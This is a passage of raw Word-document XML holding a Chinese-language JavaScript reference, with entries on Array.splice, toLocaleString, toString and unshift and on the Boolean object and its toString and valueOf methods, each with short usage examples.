        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3]</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>[1,4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(1,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.splice(1,0,2,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3]</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Array.slice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="597" w:name="Array_toLocaleString__"/>
      <w:r>
        <w:t>Array.toLocaleString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将数组转化为本地化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的本地化字符串表示。</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调用该方法时，如何对象不是</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>，则抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回数组的本地化字符串表示。它首先调用所有数组元素的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，然后使用地区特定的分隔字符将结果字符串连接起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="598" w:name="Array_toString__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="598"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将数组转化成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串表示。</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调用该方法时，如果对象不是</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法把数组转化成字符串，并返回该字符串。当数组用于字符串上下文中时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会调用该方法将数组自动转换成一个字符串。但是，在某些场景下，还是需要显式调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>在把数组转化成字符串时，首先要将每个数组元素转化为字符串（通过调用这些元素的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）。一旦每个元素都转化成字符串后，</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>就会将这些字符串以逗号分隔的列表形式输出。返回值与不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的字符串是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="599" w:name="Array_unshift__"/>
      <w:r>
        <w:t>Array.unshift()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组头部插入元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.unshift(value,...)</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t>要插入</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>头部的一个或多个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数组的新长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>会把参数插入</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的头部，并将已经存在的元素顺次往后移动，以便留出空间。该方法的第一个参数会成为数组新的元素</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，如果还有第二个参数的话，会成为新的元素</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，以此类推。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>不会创建新数组，而是直接修改数组本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>经常与</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];//a:[]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unshift(1);//a:[1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回：</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unshift(22);//a:[22,1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回：</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//a:[1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回：</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.unsh</w:t>
      </w:r>
      <w:r>
        <w:t>ift(33,[4,5]);//a:[33,[4,5],1]</w:t>
      </w:r>
      <w:r>
        <w:t>返回：</w:t>
      </w:r>
      <w:r>
        <w:t>3</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Array.shift()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="600" w:name="Boolean"/>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:bookmarkEnd w:id="600"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对布尔值的支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Boolean(value)//</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean(value)//</w:t>
      </w:r>
      <w:r>
        <w:t>转换函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象存放的值，或要转化成布尔值的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为构造函数调用（带有</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符）时，</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>会将参数转换成布尔值，并返回一个包含该值的</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象。当做函数调用（不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符）时，</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>只会将参数转换成一个原始的布尔值，并返回改值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、空字符串</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值都会转换成</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。其他原始值，除了</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（但包含</w:t>
      </w:r>
      <w:r>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串），以及其他的对象和数组都会转换成</w:t>
      </w:r>
      <w:r>
        <w:t>true</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toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表的布尔值返回</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valu</w:t>
      </w:r>
      <w:r>
        <w:t>eOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象中存放的原始布尔值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，布尔值是一种基本的数据类型。</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象是一个封装布尔值的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型主要提供将布尔值转换成字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。当调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将布尔值转换成字符串时（通常是由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>隐式调用的），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会在内部将这个布尔值转换成一个临时的</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后调用这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="601" w:name="Boolean_toString__"/>
      <w:r>
        <w:t>Boolean.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将布尔值转换成字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</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b.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>根据原始布尔值或</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的值返回</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。</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调用该方法时，如果对象不是</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>类型，则抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="602" w:name="Boolean_valueOf__"/>
      <w:r>
        <w:t>Boolean.valueOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="602"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象的布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:t>Object.ValueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>b.valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>存放的原始布尔值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
